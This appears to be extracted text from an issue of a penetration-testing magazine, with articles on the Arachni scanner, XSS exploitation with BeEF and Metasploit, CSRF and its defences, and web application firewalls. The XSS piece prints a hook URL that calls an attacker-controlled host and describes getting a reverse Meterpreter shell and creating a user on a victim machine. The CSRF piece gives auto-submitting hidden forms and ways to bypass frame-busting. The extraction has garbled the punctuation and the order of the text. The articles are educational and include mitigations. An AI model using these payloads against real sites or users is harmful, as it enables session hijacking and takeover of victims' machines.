Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
